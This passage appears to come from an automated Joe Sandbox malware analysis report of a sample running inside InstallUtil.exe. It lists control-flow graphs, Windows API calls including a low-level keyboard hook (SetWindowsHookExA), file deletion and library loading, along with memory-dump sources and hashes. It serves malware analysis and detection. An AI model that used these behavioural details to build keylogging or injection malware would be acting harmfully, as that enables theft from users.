                                                                                          • GetCurrentThreadId.KERNEL32 ref: 06A339E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: 4fbe0de0c1c82d684302f79f31368d936017d0a17afcbf16b639e97d9ca62b22
                                                                                          • Instruction ID: b87b62d9c993efdb4f8e272c4450a05ad2b3c6851e1ad583dd4dd6d840928054
                                                                                          • Opcode Fuzzy Hash: 4fbe0de0c1c82d684302f79f31368d936017d0a17afcbf16b639e97d9ca62b22
                                                                                          • Instruction Fuzzy Hash: A95164B0900649CFDB54EFAAD948B9EBBF1BF88314F208059E019B7390DB759944CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 06A33916
                                                                                          • GetCurrentThread.KERNEL32 ref: 06A33953
                                                                                          • GetCurrentProcess.KERNEL32 ref: 06A33990
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 06A339E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: ff6557bc8d943024a0d0d336608ab7c38822fb33a0f7641d8dd3c28b2fd9ee45
                                                                                          • Instruction ID: 80d9107bbf0ab9a04e2ee4bfe084ca75cf5aed06674e602452e41254ac3f9d6e
                                                                                          • Opcode Fuzzy Hash: ff6557bc8d943024a0d0d336608ab7c38822fb33a0f7641d8dd3c28b2fd9ee45
                                                                                          • Instruction Fuzzy Hash: A95154B0900749CFDB54EFAAD948B9EBBF1BF88314F208059E019A7390DB759944CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 753 6a3dfb1-6a3e0b8 767 6a3e0ba-6a3e0f0 call 6a3ba2c 753->767 768 6a3e0fe-6a3e104 753->768 776 6a3e0f5-6a3e0f6 767->776 769 6a3e106-6a3e148 768->769 770 6a3e14a-6a3e176 768->770 769->770 773 6a3e181-6a3e188 770->773 774 6a3e178-6a3e17e 770->774 778 6a3e193-6a3e232 CreateWindowExW 773->778 779 6a3e18a-6a3e190 773->779 774->773 781 6a3e234-6a3e23a 778->781 782 6a3e23b-6a3e273 778->782 779->778 781->782 786 6a3e280 782->786 787 6a3e275-6a3e278 782->787 788 6a3e281 786->788 787->786 788->788
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A3E222
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: dd39c4d491937d570e4dd000f192482687e2c5f3de30104f67f4c5e6b1655f3b
                                                                                          • Instruction ID: 7f103f8b4d483d5469ba89df4fbac191d6f208aa57a13ad29b3e9a3021f12d56
                                                                                          • Opcode Fuzzy Hash: dd39c4d491937d570e4dd000f192482687e2c5f3de30104f67f4c5e6b1655f3b
                                                                                          • Instruction Fuzzy Hash: D7714271C09399DFDB42DFA5C880A9DBFB1BF0A300F15819BF405AB262D3759945CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 789 6a3bf28-6a3bf47 792 6a3bf73-6a3bf77 789->792 793 6a3bf49-6a3bf56 call 6a3b870 789->793 795 6a3bf8b-6a3bfcc 792->795 796 6a3bf79-6a3bf83 792->796 798 6a3bf58 793->798 799 6a3bf6c 793->799 802 6a3bfd9-6a3bfe7 795->802 803 6a3bfce-6a3bfd6 795->803 796->795 847 6a3bf5e call 6a3c1c1 798->847 848 6a3bf5e call 6a3c1d0 798->848 849 6a3bf5e call 6a3c1c8 798->849 850 6a3bf5e call 6a3c1cc 798->850 799->792 804 6a3c00b-6a3c00d 802->804 805 6a3bfe9-6a3bfee 802->805 803->802 810 6a3c010-6a3c017 804->810 807 6a3bff0-6a3bff7 call 6a3b87c 805->807 808 6a3bff9 805->808 806 6a3bf64-6a3bf66 806->799 809 6a3c0a8-6a3c168 806->809 812 6a3bffb-6a3c009 807->812 808->812 842 6a3c170-6a3c19b GetModuleHandleW 809->842 843 6a3c16a-6a3c16d 809->843 813 6a3c024-6a3c02b 810->813 814 6a3c019-6a3c021 810->814 812->810 816 6a3c038-6a3c041 call 6a3449c 813->816 817 6a3c02d-6a3c035 813->817 814->813 822 6a3c043-6a3c04b 816->822 823 6a3c04e-6a3c053 816->823 817->816 822->823 824 6a3c071-6a3c07e 823->824 825 6a3c055-6a3c05c 823->825 832 6a3c0a1-6a3c0a7 824->832 833 6a3c080-6a3c09e 824->833 825->824 827 6a3c05e-6a3c06e call 6a39d98 call 6a3b88c 825->827 827->824 833->832 844 6a3c1a4-6a3c1b8 842->844 845 6a3c19d-6a3c1a3 842->845 843->842 845->844 847->806 848->806 849->806 850->806
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 06A3C18E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: bc1a1c534ae502c4579339c41adad7648b70aba419b5e78d90e785acd54ea3b1
                                                                                          • Instruction ID: bb26e544a8f488a6157ddde5dd76cd018b914112e0f8c2e729d8e17695f40747
                                                                                          • Opcode Fuzzy Hash: bc1a1c534ae502c4579339c41adad7648b70aba419b5e78d90e785acd54ea3b1
                                                                                          • Instruction Fuzzy Hash: 4F7158B0A00B158FD7A4EF29D44075ABBF2BF88314F00892DE04ADBA40DB75E845CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 851 6a3e0bd-6a3e0c4 852 6a3e0c6-6a3e0ed 851->852 853 6a3e0fe-6a3e104 851->853 856 6a3e0f5-6a3e0f6 852->856 857 6a3e0f0 call 6a3ba2c 852->857 854 6a3e106-6a3e148 853->854 855 6a3e14a-6a3e176 853->855 854->855 859 6a3e181-6a3e188 855->859 860 6a3e178-6a3e17e 855->860 857->856 862 6a3e193-6a3e232 CreateWindowExW 859->862 863 6a3e18a-6a3e190 859->863 860->859 865 6a3e234-6a3e23a 862->865 866 6a3e23b-6a3e273 862->866 863->862 865->866 870 6a3e280 866->870 871 6a3e275-6a3e278 866->871 872 6a3e281 870->872 871->870 872->872
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A3E222
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 53097a3f3101612f93cea2c73653202dd3b3d6becb49ab7605445a3196fbc69c
                                                                                          • Instruction ID: 1fda510e14b7d42ede41b5cd88225593eb94bddede73ecee3de5048ade0b020d
                                                                                          • Opcode Fuzzy Hash: 53097a3f3101612f93cea2c73653202dd3b3d6becb49ab7605445a3196fbc69c
                                                                                          • Instruction Fuzzy Hash: A351EFB1C10259AFDF55DF99C980ADEBFB6BF48310F14816AF818AB220D7719855CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 873 6a3e108-6a3e176 875 6a3e181-6a3e188 873->875 876 6a3e178-6a3e17e 873->876 877 6a3e193-6a3e1cb 875->877 878 6a3e18a-6a3e190 875->878 876->875 879 6a3e1d3-6a3e232 CreateWindowExW 877->879 878->877 880 6a3e234-6a3e23a 879->880 881 6a3e23b-6a3e273 879->881 880->881 885 6a3e280 881->885 886 6a3e275-6a3e278 881->886 887 6a3e281 885->887 886->885 887->887
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A3E222
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 5df53de190c979eb2692f8d03bea0065bb9aab3cb5477dc66e94d6e19bd837dc
                                                                                          • Instruction ID: 3a1a03d8c824afa6968bd487e2d1e64f542db7e21e46576c55983753f2b4ee80
                                                                                          • Opcode Fuzzy Hash: 5df53de190c979eb2692f8d03bea0065bb9aab3cb5477dc66e94d6e19bd837dc
                                                                                          • Instruction Fuzzy Hash: 0F41C0B1D103599FEF54CF99D984ADEBBB1BF48300F24812AE419AB210D7709885CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 888 6a3e10d-6a3e176 892 6a3e181-6a3e188 888->892 893 6a3e178-6a3e17e 888->893 894 6a3e193-6a3e1cb 892->894 895 6a3e18a-6a3e190 892->895 893->892 896 6a3e1d3-6a3e232 CreateWindowExW 894->896 895->894 897 6a3e234-6a3e23a 896->897 898 6a3e23b-6a3e273 896->898 897->898 902 6a3e280 898->902 903 6a3e275-6a3e278 898->903 904 6a3e281 902->904 903->902 904->904
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A3E222
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: bc5c1668befe6f4beff8a946199dcb9f97a482a4d1cffc975a100c16101a72cc
                                                                                          • Instruction ID: 8cdce5fef0df0a13bdd2692402a811a553ba0a2a51b11b71fa1f3dc1c9b2189c
                                                                                          • Opcode Fuzzy Hash: bc5c1668befe6f4beff8a946199dcb9f97a482a4d1cffc975a100c16101a72cc
                                                                                          • Instruction Fuzzy Hash: 9541C1B1D103599FDF54CF99D984ADEBFB5BF48310F24812AE418AB210D770A885CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 905 6a3e110-6a3e176 907 6a3e181-6a3e188 905->907 908 6a3e178-6a3e17e 905->908 909 6a3e193-6a3e1cb 907->909 910 6a3e18a-6a3e190 907->910 908->907 911 6a3e1d3-6a3e232 CreateWindowExW 909->911 910->909 912 6a3e234-6a3e23a 911->912 913 6a3e23b-6a3e273 911->913 912->913 917 6a3e280 913->917 918 6a3e275-6a3e278 913->918 919 6a3e281 917->919 918->917 919->919
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A3E222
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 6cace10cdfc5a068b461e500f828f60a475a4e119cc0b0d0fc472ef1971cb0be
                                                                                          • Instruction ID: 2bf687722d380e7cc80bdef88f7a47e11c471d57ed8ae3a6e4c3d3badce600e0
                                                                                          • Opcode Fuzzy Hash: 6cace10cdfc5a068b461e500f828f60a475a4e119cc0b0d0fc472ef1971cb0be
                                                                                          • Instruction Fuzzy Hash: 5641C0B1D103599FEF14CF99C984ADEBFB5BF48310F24812AE818AB210D770A885CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 920 6a33ad8-6a33adf 921 6a33ae0-6a33b74 DuplicateHandle 920->921 922 6a33b76-6a33b7c 921->922 923 6a33b7d-6a33b9a 921->923 922->923
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A33B67
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: db5e0fa365de87d98b3deb04a1ab1ae623258ee3c5e542628b8ad5742afb43af
                                                                                          • Instruction ID: 0b2a25f6d8818e61e3886d21ac8fa1e4ec3548c0242a9d4f30bd9c3aacbf1ab8
                                                                                          • Opcode Fuzzy Hash: db5e0fa365de87d98b3deb04a1ab1ae623258ee3c5e542628b8ad5742afb43af
                                                                                          • Instruction Fuzzy Hash: 5C2103B5900248AFDB10CFAAD884ADEBBF8EB48314F14802AE914A7350D374A940CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 937 6a33ae0-6a33b74 DuplicateHandle 938 6a33b76-6a33b7c 937->938 939 6a33b7d-6a33b9a 937->939 938->939
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A33B67
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 4031b70e14e134ef6078a092ad81ee5162641aa362014e2a33b642911c2fecaf
                                                                                          • Instruction ID: d53ec00eb157e6208b0c7f11ee37ee3491159136393c5eb79978c78ce7181f5a
                                                                                          • Opcode Fuzzy Hash: 4031b70e14e134ef6078a092ad81ee5162641aa362014e2a33b642911c2fecaf
                                                                                          • Instruction Fuzzy Hash: 9621E4B59002499FDB10CFAAD984ADEFBF4EB48310F14801AE914A7350D374A940CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 926 2e6fd30-2e6fd36 927 2e6fd3d-2e6fd82 926->927 928 2e6fd38-2e6fd3c 926->928 930 2e6fd84-2e6fd8c 927->930 931 2e6fd8e-2e6fdc0 SetWindowsHookExA 927->931 928->927 930->931 932 2e6fdc2-2e6fdc8 931->932 933 2e6fdc9-2e6fde9 931->933 932->933
                                                                                          APIs
                                                                                          • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,02E6FBA0,00000000,00000000), ref: 02E6FDB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 28ed09b5be89519a1202258427fb329282ae75efd7b8e3f6aaefe8933386d882
                                                                                          • Instruction ID: 35aae889ad417b5a0afe1802051a3024b805935088cca184c6cd9fd1236f9080
                                                                                          • Opcode Fuzzy Hash: 28ed09b5be89519a1202258427fb329282ae75efd7b8e3f6aaefe8933386d882
                                                                                          • Instruction Fuzzy Hash: 9F2177B59002099FCB10CF9AD848BEEFBF5FF88314F10842AE419A3254C774A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 962 2e68078-2e680ca 965 2e680d2-2e680fd DeleteFileW 962->965 966 2e680cc-2e680cf 962->966 967 2e68106-2e6812e 965->967 968 2e680ff-2e68105 965->968 966->965 968->967
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 02E680F0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: 6e76b1933e7a7ac28d7816ef6308e80da1ff101da0497597af43553635719b9d
                                                                                          • Instruction ID: 4522102bc5bdc181dc170bdad27e77dc03ea83823508b7b291ae6f3211b53fb5
                                                                                          • Opcode Fuzzy Hash: 6e76b1933e7a7ac28d7816ef6308e80da1ff101da0497597af43553635719b9d
                                                                                          • Instruction Fuzzy Hash: 7F2156B2C0065A9BDB10CF9AC445BEEFBB4FF08324F14812AD818B7640D378A944CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 953 2e677e0-2e680ca 956 2e680d2-2e680fd DeleteFileW 953->956 957 2e680cc-2e680cf 953->957 958 2e68106-2e6812e 956->958 959 2e680ff-2e68105 956->959 957->956 959->958
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 02E680F0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: 433cf5ffafa4b2fc78c1a35c2126ed34729fb7ba372d04376eb5b3251bec87a0
                                                                                          • Instruction ID: e931e7fb9b23b6b221f1f14bc19bfd2a7389d0d12770f776781c4a3187977242
                                                                                          • Opcode Fuzzy Hash: 433cf5ffafa4b2fc78c1a35c2126ed34729fb7ba372d04376eb5b3251bec87a0
                                                                                          • Instruction Fuzzy Hash: C82144B1C0465A9BDB10CF9AC444BEEFBB4EB08324F14826AD818B7240D378A944CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 971 6a3b8b8-6a3c3d0 973 6a3c3d2-6a3c3d5 971->973 974 6a3c3d8-6a3c407 LoadLibraryExW 971->974 973->974 975 6a3c410-6a3c42d 974->975 976 6a3c409-6a3c40f 974->976 976->975
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06A3C209,00000800,00000000,00000000), ref: 06A3C3FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 88c2a6d8ac3264bf01bd49a38233b71a90615636d7e9e6fed098f52707135f1b
                                                                                          • Instruction ID: 304d1d686d8173d40a32b7fd8dc4d20e30558d9e2d8f2ae62195eff4f4594746
                                                                                          • Opcode Fuzzy Hash: 88c2a6d8ac3264bf01bd49a38233b71a90615636d7e9e6fed098f52707135f1b
                                                                                          • Instruction Fuzzy Hash: 6911FFB68003499FDB10DF9AD844BEEFBF4EB48220F10842AE519B7600C3B9A545CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06A3C209,00000800,00000000,00000000), ref: 06A3C3FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: b7f306da61e19bfab3a578642c786083659b5381cfa717fbf60a1afb6b443937
                                                                                          • Instruction ID: 58260afb2371fb7a9c3629cae9a3ac8a5f93231888c429b2eff086a9da551eec
                                                                                          • Opcode Fuzzy Hash: b7f306da61e19bfab3a578642c786083659b5381cfa717fbf60a1afb6b443937
                                                                                          • Instruction Fuzzy Hash: 681100B6C003499FDB10CF9AD844BDEFBF4AB88320F10842AE529B7600C375A545CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06A3C209,00000800,00000000,00000000), ref: 06A3C3FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 61565c90eb1f7c440fb2f516cfb71f594120cf04551de12a44429b3e5eee7941
                                                                                          • Instruction ID: a00f7bf4d3a1249c1cd5d8d9591ac56536e1756ee403d09d85255e7302fa7c9f
                                                                                          • Opcode Fuzzy Hash: 61565c90eb1f7c440fb2f516cfb71f594120cf04551de12a44429b3e5eee7941
                                                                                          • Instruction Fuzzy Hash: 5D11E2B6C042598FDB10DF9AD844BEEFBF4AB88324F10842AE419B7610C379A545CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 02E6EEB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0
                                                                                          • Opcode ID: f9d2585dfa2efcccadc26563b5296140505fc3ccc7cdc1b55d395f2718f6835f
                                                                                          • Instruction ID: 63e82443104f2549a095bd6d094f84fa6490eff0e9dcf857d0f1530a6748b6dc
                                                                                          • Opcode Fuzzy Hash: f9d2585dfa2efcccadc26563b5296140505fc3ccc7cdc1b55d395f2718f6835f
                                                                                          • Instruction Fuzzy Hash: B71123B5C1065A9BDB10CF9AC545BDEFBF4AF48324F14816AD818B7240D378A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 06A3C18E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: d4947ea97bc75086673b4351ac8ec17cf84726dfcd35c3d270d53ea4a14fde1d
                                                                                          • Instruction ID: 4419657d0d050735d8bd6e9989c95c25c2f27eb02f3797cc0d249b8bb77b6058
                                                                                          • Opcode Fuzzy Hash: d4947ea97bc75086673b4351ac8ec17cf84726dfcd35c3d270d53ea4a14fde1d
                                                                                          • Instruction Fuzzy Hash: C8110FB5C002598FDB10DF9AC844BDEFBF4AF88224F10842AD469B7610C379A545CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 02E6EEB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0
                                                                                          • Opcode ID: 779a2e2f428f717b9e8a51c8f6cfd99928bbec4a304cb4d4f90c5753aebec3d4
                                                                                          • Instruction ID: c8402c45f19d29e5f27b8b22a583f51a4d99c7e372dbf65e7a0688dadfed0bf8
                                                                                          • Opcode Fuzzy Hash: 779a2e2f428f717b9e8a51c8f6cfd99928bbec4a304cb4d4f90c5753aebec3d4
                                                                                          • Instruction Fuzzy Hash: C71123B6C1065A9BDB10CF9AC545BEEFBF4AF08214F14816AD418B7640D378A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 06A3C18E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2594796727.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a30000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 8c49ef0cb111630ca4fe463be74d136a69272a5b7e1c691ef2960edff5b0ae4b
                                                                                          • Instruction ID: d0a51f3b8fb849371bbb6831a89a3dbeb2a7477f78e89de7ee14128c351ed733
                                                                                          • Opcode Fuzzy Hash: 8c49ef0cb111630ca4fe463be74d136a69272a5b7e1c691ef2960edff5b0ae4b
                                                                                          • Instruction Fuzzy Hash: 8F11DCB6C006598FDB10DF9AC844BDEFBF4AB88224F10842AD829B7610D379A545CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2595143786.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a50000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e85f7b897c27737d31b77c75ab6eea4ea5afa1668f429a7ad6e3ba368c811c04
                                                                                          • Instruction ID: 9bddcd5899e989fe4b84ecfbdaa9fc02afb07dca6a658901032353b93e82b622
